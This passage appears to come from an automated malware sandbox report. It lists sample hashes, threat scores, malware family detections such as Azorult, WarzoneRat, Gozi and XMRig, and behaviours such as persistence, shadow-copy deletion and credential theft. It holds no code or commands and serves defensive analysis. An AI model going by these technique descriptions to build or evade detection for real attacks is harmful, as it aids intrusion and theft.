    • Identifies Wine through registry keys

      Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

    • Adds Run key to start application

    • Target

      foo/a2981192a30538e97b55f363abbce946

    • Size

      804KB

    • MD5

      a2981192a30538e97b55f363abbce946

    • SHA1

      ae16cec3416895c912b03b7f76be2177aede6745

    • SHA256

      99e7e093c6f7be4cf21b5068a4ae746be2b3a4475ec251288d02a3985de70d48

    • SHA512

      b03fa2f833951441f5bf56711296b48a6ece3b3964d15893fcff78563e808de88fff9d644c4b73253add71eb729a7e1dc4095abdd33a7a26d60eab904e7661d3

    Score
    10/10
    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

    • Executes dropped EXE

    • Loads dropped DLL

    • Drops file in System32 directory

    • Target

      foo/aa3b51bd50bcc98f763cffcf7f907152

    • Size

      840KB

    • MD5

      aa3b51bd50bcc98f763cffcf7f907152

    • SHA1

      17868a0f0c8d52ffb80e120a010fd7737e0ecd4c

    • SHA256

      dd518cbba0506c2392969aa01ba4b9f5216724d9234055d7f0ac1db93227baf4

    • SHA512

      aba0fb7359b45e7f206632219873ee6834c01b89a9f6b4001b8299ee5422a02cfc25cf17c40522349e98b5911b09d771ec793a70e29d9770b51cf873c64249cd

    • Azorult

      An information stealer that was first discovered in 2016, targeting browsing history and passwords.

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

    • Target

      foo/acf0b7f4fe980501192187bb9b8e20c4

    • Size

      872KB

    • MD5

      acf0b7f4fe980501192187bb9b8e20c4

    • SHA1

      f627019b79fd174403cb81c9a59b1ed81b658e81

    • SHA256

      d8f2f635135cc57f0d566646bbe5c6f22be2aa4d9fcab74c272b22f7e4b28f6c

    • SHA512

      df3afaf21da7bfca412a6bcfea39913904d5a95767220f30e07d23487276fbce7bb489bf12b11f68e2a5651fc3c2b4041d76e201d3416a8bea460418d7a25683

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

    • Checks whether UAC is enabled

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Target

      foo/aeca5c301d02253e8ffcc240c08f61f7

    • Size

      105KB

    • MD5

      aeca5c301d02253e8ffcc240c08f61f7

    • SHA1

      a7d94fc834a9e73e35ea48d0d1630e2a8cfebf97

    • SHA256

      ae2b285ce6b791fc7b0b01e923db298cb53b43e646a7f34bf1c8c79c94cfc0d2

    • SHA512

      f72e6608f437f59ad924ffd5de19785262931b6e4ab2a8a70970c9aa60488ea5df08b284bb3ecbda5ae2c9b8395c2919f34e0cb051b042a41782a7a59d66fcd2

    Score
    1/10
    • Target

      foo/b1071426aa88f31339f1b369cf13cef3

    • Size

      504KB

    • MD5

      b1071426aa88f31339f1b369cf13cef3

    • SHA1

      69ff5bd81f366fece2d36c98cc3bf4a2d41b8f68

    • SHA256

      08dca503de70aabb60f5edb4ca366523a86084cf4546ad25e338c2ced99f2f6c

    • SHA512

      a6e1dd3c13dd952d09ae9cdcf1b94c99ab9b0fe7c58d957eb558353f61084ec6ae9e133f8c449ffc434efaaf3f767e30709547e3efb2106839e2d31574b18ac1

    • Modifies extensions of user files

      Ransomware generally changes the extension on encrypted files.

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Adds Run key to start application

    • Drops desktop.ini file(s)

    • Target

      foo/b2365260985173cc758575cd8059459f

    • Size

      645KB

    • MD5

      b2365260985173cc758575cd8059459f

    • SHA1

      f6e874021db45fcd4042c621499ab925b4dec1c8

    • SHA256

      d30b001d1a77d323443e37323aabc9c316dbd3be556cb57854644cd875885ba8

    • SHA512

      6fec4a3b28f4f1c8fae9e0c2f04d0157f6b4a2db87b98837dc0330820dac97c373c10cd323af421d2e3dc1be93862d645a3620c9e8f86717d65eb695c65cecca

    Score
    6/10
    • Target

      foo/b514b59324818c52140b431aeac96bfc

    • Size

      155KB

    • MD5

      b514b59324818c52140b431aeac96bfc

    • SHA1

      83d7256670dccce993acf2df73872abda39bb5be

    • SHA256

      ae57d0af018f011cd42ed91caba202201069be6fc5de6b8b3ab14162cbcbfbe5

    • SHA512

      4bfb86bd70c1f1b376255972708efd2dadc252566625d02e84ec5297580edfa50a9e321ae1503bdc6bcbe1beea8b607f445caa4bb1c940363f47512407ca6649

    Score
    1/10
    • Target

      foo/b641961018d09dfbd7fa9c15f09a7723

    • Size

      8.9MB

    • MD5

      b641961018d09dfbd7fa9c15f09a7723

    • SHA1

      69e515dd8840866fbfb1e239daf80f6fcb745f1b

    • SHA256

      44095d0a22646ef5b369ade7ce87d2f9bd51402de73f977f352de9a3a3eeed6c

    • SHA512

      e9e43f1d59be84fbc918ea601a7b489286661a81919b760e2a0339fedb93b9d3a33b148cfefdd584c163957107194b764eb2ddbad79ca2af9a5e90db3c1c9beb

    Score
    7/10
    • Loads dropped DLL

    • Target

      foo/b693dfe99d2915616044eea2cfe18360

    • Size

      286KB

    • MD5

      b693dfe99d2915616044eea2cfe18360

    • SHA1

      6415634e1fcc51714e871ccb08f26b4806aed3b0

    • SHA256

      1d4169bb0978e88bdff29844645d54763e62db8af10abc324fb2145f64304024

    • SHA512

      95081c20adc6363ba3c0f7d6390a98c5f47074a270f112a002f549009d6c50654756b89f59737b7554e3186c17355dcda57424e255aba1392a574a4b27734efb

    Score
    7/10
    • Loads dropped DLL

    • Target

      foo/b6e7c9793cf40153bf8865195e06ecbc

    • Size

      3.3MB

    • MD5

      b6e7c9793cf40153bf8865195e06ecbc

    • SHA1

      fef5dbf8ef53dafd676818196815e6b110f2bc03

    • SHA256

      0e0cb0d76bc848f729878dab7218f4e12c9c0cc7d5c939e5d92995ba422ea7ec

    • SHA512

      d12eb44304f7054e060a105bff9f3861aa16bb10fd72bbd819a8ffe3d23818ce66f5d790a929d41cee4161bbbe78d0077d167fe792c3e27c018dc88632a5e5ee

    • Gozi, Gozi IFSB

      Gozi ISFB is a well-known and widely distributed banking trojan.

    • Identifies VirtualBox via ACPI registry values (likely anti-VM)

    • Executes dropped EXE

    • Checks BIOS information in registry

      BIOS information is often read in order to detect sandboxing environments.

    • Identifies Wine through registry keys

      Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

    • Loads dropped DLL

    • Adds Run key to start application

    • Checks whether UAC is enabled

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Writes to the Master Boot Record (MBR)

      Bootkits write to the MBR to gain persistence at a level below the operating system.

    • Suspicious use of NtSetInformationThreadHideFromDebugger

    • Target

      foo/b7d5f0b9bf2e6e13c5b3ca1c2a0a8b4a

    • Size

      99KB

    • MD5

      b7d5f0b9bf2e6e13c5b3ca1c2a0a8b4a

    • SHA1

      15a0e8dea24b904cd083ed51b28098726ecceed4

    • SHA256

      0b499361076d8d02fa6b313a08199fd10cd9af1abc7fae0b091039be0194c0f3

    • SHA512

      674d28fb9900070fd0cc58940fb97fbbeabea2d167ad19e248fe8a980221f6ea79d9f1795c019b844896e8b19ce1d746bda6c34040c1ae535b9e22135692a0d0

    • WarzoneRat, AveMaria

      WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

    • Warzone RAT Payload

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

    • Target

      foo/ba2d460199eb2d9e9d6d0559bb455529

    • Size

      39KB

    • MD5

      ba2d460199eb2d9e9d6d0559bb455529

    • SHA1

      8c50ef4cd9feadf857ad2d501e3d03bd55d5de4d

    • SHA256

      a3f13a940ae3f6d0a8e94c8ab203005cd737a899962425f1600a4bdf30877375

    • SHA512

      dd376f8f9f05d509eca465c04c451d83a12043f614d90a04c63b25f202f9e87e3960666e2710e19538c9818a778fd81832b45c1e495c263b6725991413755fcc

    Score
    1/10
    • Target

      foo/bad78e11371381ce9e1d703aac2821e5

    • Size

      210KB

    • MD5

      bad78e11371381ce9e1d703aac2821e5

    • SHA1

      76ad0abaf1c99c741352a16e5b2f71fb38fed0e4

    • SHA256

      18dfcf81046272e08f6ef3230df83008cb78eb30cda341c59ceb33c5be542d85

    • SHA512

      8bccc4535dd97b483f10eda69f91a17e794b122215bb2e926a114ec46e8935ab0a1e5e1cb0b6fa3b6bb0a5a6d1b669a87579850197af4a0c33b3bb57a7f00b25

    Score
    9/10
    • Deletes shadow copies

      Ransomware often targets backup files to inhibit system recovery.

    • Modifies extensions of user files

      Ransomware generally changes the extension on encrypted files.

    • Deletes itself

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Drops desktop.ini file(s)

    • Target

      foo/bc6536b86b04cf5b3bf7cd353d615ab9

    • Size

      583KB

    • MD5

      bc6536b86b04cf5b3bf7cd353d615ab9

    • SHA1

      5e796021e22ed016697d6aefb0b955c57b4b8dc8

    • SHA256

      1e8dbcedd0e30e32583548508edc4cf2b8f3d0f731a1a65559fe83382298136f

    • SHA512

      f1f3fd81b2e56daa77cabbed191978b51308d8202e35d34cdc300d9fa429a426f88fad618ae7df9bed0a6f2ce665ad4586a5d5cbc6099e98e4b9bcda1cd160ab

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

    • Grants admin privileges

      Uses net.exe to modify the user's privileges.

    • Creates new service(s)

    • Executes dropped EXE

    • Modifies Windows Firewall

    • Sets file execution options in registry

    • Sets file to hidden

      Modifies file attributes to stop it showing in Explorer etc.

    • Stops running service(s)

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Loads dropped DLL

    • Modifies file permissions

    • Modifies WinLogon

    • Drops file in System32 directory

    • Target

      foo/be85e0b2608a55942aa101c66ce6c32c

    • Size

      728KB

    • MD5

      be85e0b2608a55942aa101c66ce6c32c

    • SHA1

      77e651fa75f8221458777a0d290ccae73682204a

    • SHA256

      c77d9095b13bfa202cfdfa87475cb1799fcdf8152a3d298300d63ca16abd3757

    • SHA512

      f0a2f943e251cc96ee7026bdc25cc920afd79d42ab1ec112a641d881602117fa1cfd8b39b18b9e28a9e6b1401fcf133e052be2e63a654eaf34075342a7d5a3bd

    Score
    1/10
    • Target

      foo/c914b169d1388c5e78421045d05946ee

    • Size

      3.5MB

    • MD5

      c914b169d1388c5e78421045d05946ee

    • SHA1

      4f2de494d334710253cf3ad40faf1d07e048d55c

    • SHA256

      e1ee4f9cb208e3560177f49c3e809a29ff9fa0b0daed5316f17caf22647e4eef

    • SHA512

      96dc235e2a93f99682f26f95ff0986db2b8a09e5b3470122270de5c3ea77575356178a51c6d7e3515f68fad894ebb63e2b86e3766f6f12ffa3930ca1192205f2

    Score
    3/10
    • Target

      foo/c944eadb6e032fd9e7a0988464a6f1cc

    • Size

      160KB

    • MD5

      c944eadb6e032fd9e7a0988464a6f1cc

    • SHA1

      c21551f6885ac52f80a5e303ef3cb6d40c182d11

    • SHA256

      2e4a248e3f279a42e2bea37409ab0de8770a3cd4a3b5fcccd701a535c2436d52

    • SHA512

      475ed1d94361538bdd71d21b4127fc1b7bab5edfc0ad917b7c3bbdfa51a8ed11ff6f0d4df47e3be266f07a4722448d53a926d041a161a5646efec94eecd3bde9

    Score
    8/10
    • Executes dropped EXE

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Loads dropped DLL

    • Target

      foo/cad3634df5d5058551bed38237ab8e8b

    • Size

      823KB

    • MD5

      cad3634df5d5058551bed38237ab8e8b

    • SHA1

      2f2ac22494e49ce18470677690ee9bdfcd9f0c74

    • SHA256

      663ef562dbd3a7fc7490fd6ebc11c328450db6f5a9f9e058c4d3ec663b925147

    • SHA512

      bc1eee26f9375f0138fc571aaf2602d9b4c14e7052867e739fd131450b3453a1a19424031ae6ff80c1cfac4a6e71e9087255e97a3f3d9053f84451b745054ebe

    Score
    6/10
    • Legitimate hosting services abused for malware hosting/C2

    • Target

      foo/cd89b6c808c296cde0bc77ee630dc7df

    • Size

      284KB

    • MD5

      cd89b6c808c296cde0bc77ee630dc7df

    • SHA1

      47a17c5b8263acb882f078b81897f615c25de0ca

    • SHA256

      246ad930ec77776b847e9470b725029f5dd5e0384b869d6105c3571b8cb8189a

    • SHA512

      a51620d5170356cabb73cfe2f9f2de54d52467c3a126b2b34eef5d18a84b6cd6e68b2003168c8b077abee1d58d1aa9e5af58ee65eaaee4a75f9414c04bc169fa

    Score
    8/10
    • Executes dropped EXE

    • Loads dropped DLL

    • Reads data files stored by FTP clients

      Tries to access configuration files associated with programs like FileZilla.

    • Reads user/profile data of local email clients

      Email clients store some user data on disk where infostealers will often target it.

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Adds Run key to start application

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Suspicious use of SetThreadContext

    • Target

      foo/d81e76123ccb64b73eeac2f31a7434c4

    • Size

      4.7MB

    • MD5

      d81e76123ccb64b73eeac2f31a7434c4

    • SHA1

      6a32284225e897965972ba4915e5c327b900b81a

    • SHA256

      695ac197f95781e22c61604838e3e339285b08259a971289ce6993d409fcbc4a

    • SHA512

      37404b0e8fa7825f837ff9d6ab1e487bc1591daf46b57bfe030b7c015937ba80605db96f649ec024761d13eeb2cba86ab50870af9007bc75fe6043fd8b8f6cc0

    • Glupteba

      Glupteba is a modular loader written in Golang with various components.

    • Glupteba Payload

    • Suspicious use of NtCreateUserProcessOtherParentProcess

    • Windows security bypass

    • Executes dropped EXE

    • Modifies Windows Firewall

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Loads dropped DLL

    • Windows security modification

    • Adds Run key to start application

    • Target

      foo/d86d2cb12111422ad0b401afa523e308

    • Size

      894KB

    • MD5

      d86d2cb12111422ad0b401afa523e308

    • SHA1

      d019e10b793b78f2da2f006acdb0aeff6b57d927

    • SHA256

      bfefbd8050f0dfbe1047ddcc07e951967a5b8395190127d97d0c3a4441c919bf

    • SHA512

      e9bea547df7cd2b5cfab5890245ca2540828eb87aba7052a3d5c0cc11d03552c8d39ba0bfc9994acafc257facf9797f1cbaa149e7628d99124bf2b53b840a78e

    • HawkEye Reborn

      HawkEye Reborn is an enhanced version of the HawkEye malware kit.

    • M00nd3v_Logger

      M00nd3v Logger is a .NET stealer/logger targeting passwords from browsers and email clients.

    • M00nD3v Logger Payload

      Detects M00nD3v Logger payload in memory.

    • NirSoft MailPassView

      Password recovery tool for various email clients

    • NirSoft WebBrowserPassView

      Password recovery tool for various web browsers

    • Nirsoft

    • Drops startup file

    • Uses the VBS compiler for execution

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Suspicious use of SetThreadContext

    • Target

      foo/d8e37dd7ca017370a0b54147a27a7498

    • Size

      8.4MB

    • MD5

      d8e37dd7ca017370a0b54147a27a7498

    • SHA1

      c6167da141d215d31aef6ac9e332f58118edb70d

    • SHA256

      00ef059476bea303a3d8c6621e7286c32a953e4c83c30361938fd338e9665f9b

    • SHA512

      6a0c989f8ebfe2dc2706a4241db52962dadc6cf94749a9408dd534531582a061be3aa860e65b15e96c172292b607c8606e4e8fde11e05b0840f4eb2e4540b355

    Score
    9/10
    • ACProtect 1.3x - 1.4x DLL software

      Detects file using ACProtect software.

    • Loads dropped DLL

    • Target

      foo/dea515c25081073ec2cee293b2991ee1

    • Size

      1.4MB

    • MD5

      dea515c25081073ec2cee293b2991ee1

    • SHA1

      811a254ac1f803d5707310f87e454bb7504f0757

    • SHA256

      9ee19d067ec19b2c6d07726448639c869d61138e2f53c9eed136c3a2622c881b

    • SHA512

      68886a649fbc0f53a63fd7f437508dd93dd7e8cd6ae67640a07206a4ffdf349c7e662721b42c9cb68a889888d29d6d693f26273ce2db27d36440f4482cb8d530

    Score
    10/10
    • Remcos

      Remcos is a closed-source remote control and surveillance software.

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

    • Suspicious use of SetThreadContext

    • Target

      foo/dfcc555a02bccc9c438b08555b5c2ab8

    • Size

      252KB

    • MD5

      dfcc555a02bccc9c438b08555b5c2ab8

    • SHA1

      5f10b75aa47823bc7e81a859fdced21b8556040d

    • SHA256

      1095b754656cf05da5e65406de095e1b1dd4b28c2c2f8efca5e34283bd17e0b5

    • SHA512

      fcb9ef49ec2f7eab67394997a92cdb15c11878434c6ed47240fafd71ea4c8993fbd0f986d4086e51473a5168d472e4eaeb993491bd36f0a804008dc5a0eb6b6c

    Score
    7/10
    • Loads dropped DLL

    • Target

      foo/e03bd458de4a107688236bdc4ddc3afe

    • Size

      431KB

    • MD5

      e03bd458de4a107688236bdc4ddc3afe

    • SHA1

      55859c4fa195c36a48425bb8aca9ef3609b62e89

    • SHA256

      344bce1df6486b71b78e85d6dce7ba1929176afda786acac56b6a11b625cd21c

    • SHA512

      f4585ddb1aff65d34a5a33c95a29c0c816f0ed5009faf7cc7ba26adf9bea3e787c1efa82c9c8423fc2bfdc8d4b9324566f0ab33b4212bb625c36052fb27c5948

    Score
    8/10
    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Suspicious use of SetThreadContext

    • Target

      foo/e16ec7bc29b68f66e90fdbfefe1d3a2d

    • Size

      674KB

    • MD5

      e16ec7bc29b68f66e90fdbfefe1d3a2d

    • SHA1

      156d9d781a1302d8e958486effcec79713c41708

    • SHA256

      fe9470a406b6dadc18cb3a430671d3ac321e97eb8d1ecf0dc054db440df7187d

    • SHA512

      c9e7c58170fb110bb9b76ec17a4349f5a73b912cd6c36d85d1aca7f1c94cbf70563900c36c4702f49a3ff4776fd45162e4a0f94ca826b2eff60668bcca9c55ec

    Score
    8/10
    • Executes dropped EXE

    • Loads dropped DLL

    • Target

      foo/e61c0e180c2616fa81e6c4d581a9520e

    • Size

      4.9MB

    • MD5

      e61c0e180c2616fa81e6c4d581a9520e

    • SHA1

      d91996fabaa7a1af229ce118551aeef66e389cb7

    • SHA256

      a2fd87672b5dc07057c47208124b7f02862c4f5512f1b667ea27bc79a8d57ba2

    • SHA512

      21c84bd84c125be26d7fe053a0b11d2c31f29a38355be85ed17d2303b5700c7b335a7c2a924e6a1c4c3b05ff9fbda88745a20ad3a0449f6c193d718f503e68de

    Score
    7/10
    • Reads data files stored by FTP clients

      Tries to access configuration files associated with programs like FileZilla.

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Accesses cryptocurrency files/wallets, possible credential harvesting

    • Target

      foo/e78fad8a5d0ea89127ed36ed20bc9351

    • Size

      11.1MB

    • MD5

      e78fad8a5d0ea89127ed36ed20bc9351

    • SHA1

      816c12862830ec0c0ec065c7d73f2128cb4cc9dd

    • SHA256

      b25d571c5210bb02ba01a54a75a781094397bda7bc4745b2aa4c4a971233fb56

    • SHA512

      515e6aac22e11d8fb9663fab08250afe56c94faf93fe8062cea079d8633d1338f4e94735a5a46cf75b16c05570090cb1a47a464aaa64e549432536f4dce03d9f

    Score
    8/10
    • Executes dropped EXE

    • Loads dropped DLL

    • Target

      foo/e7ad45164be5c3c7f9936e9b5fb28788

    • Size

      558KB

    • MD5

      e7ad45164be5c3c7f9936e9b5fb28788

    • SHA1

      a2cd13bc8bce9b107ac38662c35d70c4ff1d16b8

    • SHA256

      8c9c9951c2bf631b818a5e1dcdf700342f1c0c05391ec3c9c4ee15496aa28f4f

    • SHA512

      1bc0e6e3b9e416cf152d2ddef23d928c90725b589eb30d62c1c6f880af83b3068de1d27050e89f9961d71f664f98a6694fc0cf698d1c861c9a7b131efa419bfa

    Score
    3/10
    • Target

      foo/e95678212c7218c6e7944fca1631c88f

    • Size

      861KB

    • MD5

      e95678212c7218c6e7944fca1631c88f

    • SHA1

      45a011ec5b1eb913a6f9bf4b46389dbeeeb6e1f3

    • SHA256

      2a5100ba7bfe592e112ab0071d8ea1861b4d365fc4fb98f4e2be0459b990db72

    • SHA512

      16f286de9ceb5545efc477741ec0e69f4de40e1a864ed00d16854e1c0580655f5d0ea93450602c3a2598e889078ab8a12923244710c67b23e3f3551fd0f76b9e

    Score
    1/10
    • Target

      foo/edf723c8e404cd67041e7dfbbb1a6eee

    • Size

      75KB

    • MD5

      edf723c8e404cd67041e7dfbbb1a6eee

    • SHA1

      96a2fda8f26018724c86b275fe9396e24b26ec9e

    • SHA256

      bf2534b2f059547967bb453d67909921a41c10cdd19c1ec346a193060b094e2e

    • SHA512

      04bea993ba6af7e568bdfee4185e8145e4111af6bb92a68de3785658e0f5a65e741b378848eb9e77aa200cd72ab94339fcf852aae41cac45ea64bd430b8f9f50

    Score
    1/10
    • Target

      foo/f2366f48d3534bc8af573f2696dce4f5

    • Size

      191KB

    • MD5

      f2366f48d3534bc8af573f2696dce4f5

    • SHA1

      706750f403d6f12c10489befa6032c1c4eb30a3e

    • SHA256

      f7fab7d724f492cb7baccb49c5fdef8305bebe9896a6853913b5d3ec225d51b0

    • SHA512

      9fd4632204c33bbd124bfff5744c8da551a4a8f94c4f714413861e92f6b4d70f4f506d8079540adfd19ded4ace9c9745891617bbfa3d00784cfea24b04913c35

    Score
    1/10
    • Target

      foo/f645a94491240317caccd6f8508fba1f

    • Size

      1.9MB

    • MD5

      f645a94491240317caccd6f8508fba1f

    • SHA1

      59c94235d380d09a479291cd3400694d1c2ec18d

    • SHA256

      c130982342656ad1b4d588b0e985ec9d6169f279bbb748cd09727a3e96622fd2

    • SHA512

      8731c4c9cce9922793418ee7ae095893195f0609731aa0312fd38d548a94b2ba0a5bd437a8586c4c05f85cd45cac61caad3f1311b91b9db87baf61a2d4327280

    Score
    1/10
    • Target

      foo/f65e75d9675a50f9b4807e79dcc48d56

    • Size

      1.8MB

    • MD5

      f65e75d9675a50f9b4807e79dcc48d56

    • SHA1

      8ed35b0ce78c565441ee6ac5722347fbeb220305

    • SHA256

      36a4d9e2eb623e59acbaf14341c3998114fcce9bc37392572213d9d22b2fb450

    • SHA512

      9da997c23af8b5bb90abfa7eb7e967ef026645604d3652a39a7c2a9ce719e7110956fe7e491c9bf733fd1da14f0cc518681bde409498c12797678e166c72fc5f

    Score
    1/10
    • Target

      foo/f660284cb3574213a512e3f03ca9012b

    • Size

      995KB

    • MD5

      f660284cb3574213a512e3f03ca9012b

    • SHA1

      8051d5262c8c67e8888fc1991fbe667d4b4e311d

    • SHA256

      f0d6ee327670c99e451f6e54b842a3ced72b1de7e586ba81bdd27dc5366613d0

    • SHA512

      3b54928c6d1eb9e36db5ec8aeffa06b08d3e5c4167d9a884d2133282e5511edcaa7eed45832ff172bd1e71ddd56150f726382c528960f7db82a6aa87c6e9d890

    Score
    8/10
    • Executes dropped EXE

    • Loads dropped DLL

    • Reads user/profile data of local email clients

      Email clients store some user data on disk where infostealers will often target it.

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Suspicious use of SetThreadContext

    • Target

      foo/f6c1c72f3e45d2f3499b6bd6661b3289

    • Size

      387KB

    • MD5

      f6c1c72f3e45d2f3499b6bd6661b3289

    • SHA1

      aabaf0e9fbda0e00d53ef30ad736b9a3db9973c2

    • SHA256

      90120bc1c6a88ef6032b2ea5da0b8e9432ce6cfe126e9fef4515f0660a6a88ec

    • SHA512

      c50e1c73ea369c7dd87a650a635b3e9702a4be13ddba87cf1ba649e9ad8522503d643d256486dbd3973b35beb3e77d97d180c771d099c40f380834647ce9f318

    • Azorult

      An information stealer that was first discovered in 2016, targeting browsing history and passwords.

    • Target

      foo/fbab903080d6a4e65a1a2f6bc4d97b7c

    • Size

      1.6MB

    • MD5

      fbab903080d6a4e65a1a2f6bc4d97b7c

    • SHA1

      0a7eee729e7d140ca81b9595578ee305651a6946

    • SHA256

      cf1b96af0838abbd8b8a292f4aa5e335743eb3d5da862254a86184db37ecf85e

    • SHA512

      894bc25e7bdab656988a8e6b419eeee4b696e9e644f38142fcb373f557dd7170dc7ce0979ccd3c6b84b0eea32822669c9f244182391d1719c8db22d5c61b1dd7

    Score
    7/10
    • Loads dropped DLL

    • Drops file in System32 directory

    • Target

      foo/fcdc003a1529fe3660b160fd012173b3

    • Size

      3.4MB

    • MD5

      fcdc003a1529fe3660b160fd012173b3

    • SHA1

      a517d1137be23fc41f03efdb0e9354089bedf6ba

    • SHA256

      6490b57b8944f8f07e687a4dfa6ab76080de99ffc9d48d4c10f64dd88fa2cb95

    • SHA512

      a00b22d8a348891a828e4c16e0e56fc66caf29fa1f43ca3cd97ffa76675700446e905750016ea083a67592a7d2aea02c3396306527efb7fa255e08c9748e7d21

    Score
    8/10
    • Executes dropped EXE

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Loads dropped DLL

    • Target

      foo/fffb61eaaac6e8a40bfaa7a4acb6b9ba

    • Size

      195KB

    • MD5

      fffb61eaaac6e8a40bfaa7a4acb6b9ba

    • SHA1

      84deb15aeea324b2d11922c2fa4aebd039a5f805

    • SHA256

      8e22a34621adf78355b916d1a96ef4a6de5caa0dcb6e7949fa2df88ddfd999fd

    • SHA512

      07a9f94e70e461142e3e06921bfca1f9fe8723a68b6ff067651f5685bbf1c823de4beda42dc4c1ef44c969a494682e2c41ba6a1235d0a978ce6d070f4b24bd38

    Score
    1/10

MITRE ATT&CK Enterprise v6

Tasks

static1

upx, aspackv201535648626, pyinstaller, rat, vmprotect, cobaltstrike, qakbot, limerat, gozi_ifsb, warzonerat
Score
10/10

behavioral1

Score
1/10

behavioral2

Score
1/10

behavioral3

Score
4/10

behavioral4

Score
4/10

behavioral5

smokeloader, backdoor, trojan
Score
10/10

behavioral6

smokeloader, backdoor, trojan
Score
10/10

behavioral7

bootkit, persistence
Score
8/10

behavioral8

bootkit, persistence
Score
8/10

behavioral9

discovery
Score
7/10

behavioral10

discovery
Score
7/10

behavioral11

Score
8/10

behavioral12

Score
8/10

behavioral13

imminent, spyware, trojan
Score
10/10

behavioral14

imminent, spyware, trojan
Score
10/10

behavioral15

Score
1/10

behavioral16

Score
1/10

behavioral17

aspackv2, evasion, persistence, trojan, upx
Score
10/10

behavioral18

aspackv2, evasion, persistence, trojan, upx
Score
10/10

behavioral19

Score
5/10

behavioral20

Score
5/10

behavioral21

warzonerat, infostealer, persistence, rat
Score
10/10

behavioral22

warzonerat, infostealer, persistence, rat
Score
10/10

behavioral23

Score
1/10

behavioral24

Score
1/10

behavioral25

discovery
Score
8/10

behavioral26

discovery
Score
8/10

behavioral27

betabot, backdoor, botnet, evasion, trojan
Score
10/10

behavioral28

betabot, backdoor, botnet, evasion, trojan
Score
10/10

behavioral29

lokibot, spyware, stealer, trojan
Score
10/10

behavioral30

lokibot, spyware, stealer, trojan
Score
10/10

behavioral31

Score
3/10

behavioral32

Score
3/10

behavioral33

tofsee, xmrig, evasion, miner, persistence, trojan
Score
10/10

behavioral34

tofsee, xmrig, evasion, miner, persistence, trojan
Score
10/10

behavioral35

upx
Score
9/10

behavioral36

upx
Score
9/10

behavioral37

persistence
Score
6/10

behavioral38

persistence
Score
6/10

behavioral39

cobaltstrike, backdoor, trojan
Score
10/10

behavioral40

cobaltstrike, backdoor, trojan
Score
10/10

behavioral41

imminent, spyware, trojan
Score
10/10

behavioral42

imminent, spyware, trojan
Score
10/10

behavioral43

Score
4/10

behavioral44

Score
4/10

behavioral45

matrix, discovery, persistence, ransomware
Score
10/10

behavioral46

matrix, discovery, persistence, ransomware
Score
10/10

behavioral47

hawkeye, keylogger, persistence, spyware, stealer, trojan
Score
10/10

behavioral48

hawkeye, keylogger, persistence, spyware, stealer, trojan
Score
10/10

behavioral49

evasion, persistence, trojan
Score
10/10

behavioral50

evasion, persistence, trojan
Score
10/10

behavioral51

Score
1/10

behavioral52

Score
1/10

behavioral53

agenttesla, keylogger, persistence, spyware, stealer, trojan
Score
10/10

behavioral54

agenttesla, keylogger, persistence, spyware, stealer, trojan
Score
10/10

behavioral55

adware, discovery, persistence, stealer
Score
7/10

behavioral56

adware, discovery, persistence, stealer
Score
7/10

behavioral57

persistence
Score
8/10

behavioral58

persistence
Score
8/10

behavioral59

spyware, upx
Score
8/10

behavioral60

spyware
Score
7/10

behavioral61

lokibot, persistence, spyware, stealer, trojan
Score
10/10

behavioral62

lokibot, persistence, spyware, stealer, trojan
Score
10/10

behavioral63

Score
8/10

behavioral64

Score
8/10

behavioral65

Score
1/10

behavioral66

Score
1/10

behavioral67

evasion
Score
9/10

behavioral68

evasion
Score
9/10

behavioral69

Score
8/10

behavioral70

Score
8/10

behavioral71

Score
7/10

behavioral72

Score
7/10

behavioral73

Score
1/10

behavioral74

njrat, evasion, persistence, trojan
Score
10/10

behavioral75

Score
1/10

behavioral76

Score
1/10

behavioral77

Score
1/10

behavioral78

Score
1/10

behavioral79

bootkit, persistence
Score
8/10

behavioral80

bootkit, persistence
Score
8/10

behavioral81

Score
7/10

behavioral82

Score
7/10

behavioral83

persistence
Score
8/10

behavioral84

persistence
Score
8/10

behavioral85

evasion, ransomware
Score
9/10

behavioral86

evasion, ransomware
Score
9/10

behavioral87

qakbot, 1535648626, banker, persistence, stealer, trojan
Score
10/10

behavioral88

qakbot, 1535648626, banker, persistence, stealer, trojan
Score
10/10

behavioral89

Score
8/10

behavioral90

imminent, persistence, spyware, trojan
Score
10/10

behavioral91

Score
8/10

behavioral92

Score
8/10

behavioral93

limerat, rat
Score
10/10

behavioral94

limerat, rat
Score
10/10

behavioral95

Score
7/10

behavioral96

Score
7/10

behavioral97

Score
7/10

behavioral98

Score
7/10

behavioral99

evasion, persistence, trojan, upx
Score
10/10

behavioral100

evasion, persistence, trojan, upx
Score
10/10

behavioral101

Score
1/10

behavioral102

Score
1/10

behavioral103

Score
8/10

behavioral104

Score
8/10

behavioral105

upx
Score
8/10

behavioral106

upx
Score
8/10

behavioral107

Score
1/10

behavioral108

Score
1/10

behavioral109

